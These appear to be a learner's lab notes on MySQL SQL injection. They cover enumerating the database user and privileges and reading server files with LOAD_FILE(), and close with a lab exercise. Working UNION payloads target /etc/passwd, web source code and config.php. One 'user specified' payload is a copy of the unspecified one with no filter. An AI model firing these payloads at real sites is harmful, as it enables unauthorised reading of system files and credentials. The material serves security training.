# Introduction - In addition to gathering data from various tables and dbs within the DBMS, a SQL Injection can also be leveraged to perform many other operations, such as reading and writing files on the server and even gaining RCE on the back-end server - Reading data is much more common than writing data, which is strictly reserved for privileged users in modern DBMSes, as it can lead to system exploitation, as we will see - With `MySQL`, the DB user must have the `FILE` privilege to load a file's content into a table and then dump data from that table and read files # Privileges - First, we need to determine the current user we are wrt the db with one of the below queries or UNION payloads - While we do not always need db admin (DBA) privs, this is more-and-more common ```mysql SELECT USER() SELECT CURRENT_USER() SELECT user from mysql.user #UNION payloads cn' UNION SELECT 1, user(), 3, 4-- - cn' UNION SELECT 1, user, 3, 4 from mysql.user-- - ``` ![[images/Pasted image 20251204151259.png]] - Second, we need to determine the privs for the current user with the below query or UNION payloads - If the query returns `Y`, which means `YES`, this indicates that the current user has superuser privs ```mysql SELECT super_priv FROM mysql.user #UNION payloads cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- - cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- - ``` ![[images/Pasted image 20251204151312.png]] - Alternatively, we can dump other privs directly from the schema with the below UNION payloads ```mysql # No user/grantee specified cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- - # User/grantee specified cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- - ``` ![[images/Pasted image 20251204151448.png]] # Using the `LOAD_FILE()` Function to Read Files - Now that we know we have enough privileges to read local system files, let us do that using the `LOAD_FILE()` function - The [LOAD_FILE()](https://mariadb.com/kb/en/load_file/) function can be used in MariaDB / MySQL to read data from files - The function takes in just one argument, which is the file name - See the below query and UNION payload ```mysql SELECT LOAD_FILE('/etc/passwd'); #UNION Payload cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- - ``` ![[images/Pasted image 20251204151642.png]] ## Second Example - We know that the current page is `search.php` - Furthermore, the default Apache webroot is `/var/www/html` - With the above info in mind, let us try reading the source code of the file at `/var/www/html/search.php` with the below UNION payload ```mysql cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- - ``` ![[images/Pasted image 20251204151748.png]] - Here, the HTML code is rendered within the browser - We can see the full HTML source using [CRT+U] to reveal the entire PHP code ![[images/Pasted image 20251204151901.png]] # Exercise - Enumerate current user with below UNION payload ```mysql cn' UNION SELECT 1, user(), 3, 4-- - ``` ![[images/Pasted image 20251204172447.png]] - Enumerate `root` privs with below UNION payload ```mysql cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- - ``` ![[images/Pasted image 20251204172542.png]] - Read source code for `search.php` using below UNION payload ```mysql cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- - ``` ![[images/Pasted image 20251204172703.png]] - Try to read `config.php` using the below UNION payload because we see a mention thereof in the below snippet from the source for `search.php` ![[images/Pasted image 20251204172912.png]] ```mysql cn' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3, 4-- - ``` ![[images/Pasted image 20251204172958.png]]